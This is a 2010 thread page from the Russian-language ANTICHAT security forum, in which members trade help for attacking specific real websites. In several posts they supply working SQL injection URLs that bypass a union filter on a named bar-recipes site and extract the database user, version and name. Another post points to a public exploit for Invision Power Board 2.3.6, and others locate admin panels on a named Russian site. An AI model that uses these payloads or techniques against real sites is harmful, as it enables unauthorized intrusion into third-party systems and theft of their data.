HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15591  
Старый 13.11.2010, 14:54
DeepBlue7
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073

Репутация: 44
По умолчанию

Цитата:
Сообщение от swat_  
swat_ said:
подскажите пожалуйста что это за уязвимость
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//userttool-258-www.bigpoint.net/[/COLOR][/COLOR] 
А с чего ты это взял, что это "уязвимость" ?. Прочитай ошибку.

Код:
Code:
Notice: failed to build language-file ut.login in /home/shared/include/XmlLanguageParser/1/XmlLanguageParser.class.php on line 103
 
Ответить с цитированием

  #15592  
Старый 13.11.2010, 15:03
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

Цитата:
Сообщение от JohnnyBGoode  
JohnnyBGoode said:
Не знаю даже,помимо колонки password,откуда достал хэш,есть еще колонка hash,но оттуда что-то ничего не выводится
Проверьте:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]select count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]hash[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from table_name[/COLOR][/COLOR
Где hash - имя откуда у вас ничего "не выводится"

Если вывело "0", то нету записей.
 
Ответить с цитированием

  #15593  
Старый 13.11.2010, 21:49
ALIM
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855

Репутация: 0
По умолчанию

помогите раскрутить скуль, стоит фильтрация на юнион

через name_const не выходит

http://www.thebartend.com/drinks/ShotsShooters/R.php?id=5714%20order%20by%209%20--
 
Ответить с цитированием

  #15594  
Старый 13.11.2010, 22:02
freezed
Guest
Сообщений: n/a
Провел на форуме:
31258

Репутация: 7
По умолчанию

Цитата:
Сообщение от ALIM  
ALIM said:
помогите раскрутить скуль, стоит фильтрация на юнион
через name_const не выходит
http://www.thebartend.com/drinks/ShotsShooters/R.php?id=5714%20order%20by%209%20--
http://www.thebartend.com/drinks/ShotsShooters/R.php?id=5714+and+1=0+union(select+concat_ws(0x3a, user(),version(),database()),2,3,4,5,6,7,8,9)+--+
 
Ответить с цитированием

  #15595  
Старый 13.11.2010, 22:06
ALIM
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855

Репутация: 0
По умолчанию

tnx
 
Ответить с цитированием

  #15596  
Старый 13.11.2010, 22:09
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

вот более простой способ:

http://www.thebartend.com/drinks/ShotsShooters/R.php?id=-5714+/*!UNION*/+SELECT+VERSION(),2,3,4,5,6,7,8,9--
 
Ответить с цитированием

  #15597  
Старый 14.11.2010, 00:21
DeepBlue7
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073

Репутация: 44
По умолчанию

Есть ли в паблике рабочий сплоит под Invision Power Board 2.3.6 версии ?

Заранее благодарю.
 
Ответить с цитированием

  #15598  
Старый 14.11.2010, 00:53
TreV@N
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме:
792994

Репутация: 104
По умолчанию

Цитата:
Сообщение от DeepBlue7  
DeepBlue7 said:
Есть ли в паблике рабочий сплоит под Invision Power Board 2.3.6 версии ?
Заранее благодарю.
http://www.exploit-db.com/exploits/10304/
 
Ответить с цитированием

  #15599  
Старый 14.11.2010, 17:39
ra0cg
Участник форума
Регистрация: 09.11.2008
Сообщений: 206
Провел на форуме:
1638275

Репутация: 539
Отправить сообщение для ra0cg с помощью ICQ
По умолчанию

Цитата:
Сообщение от svesve  
svesve said:
Друзья помогите найти админку
http://loesk.ru/
я уже все перерыл
https://loesk.ru/manager/
 
Ответить с цитированием

  #15600  
Старый 14.11.2010, 17:51
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

Цитата:
Сообщение от svesve  
svesve said:
Спасибо! но это ISP
а там где-то должна быть панелька управления самой CMS
http://loesk.ru/myadmin/

Не знаю, может быть поможет.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ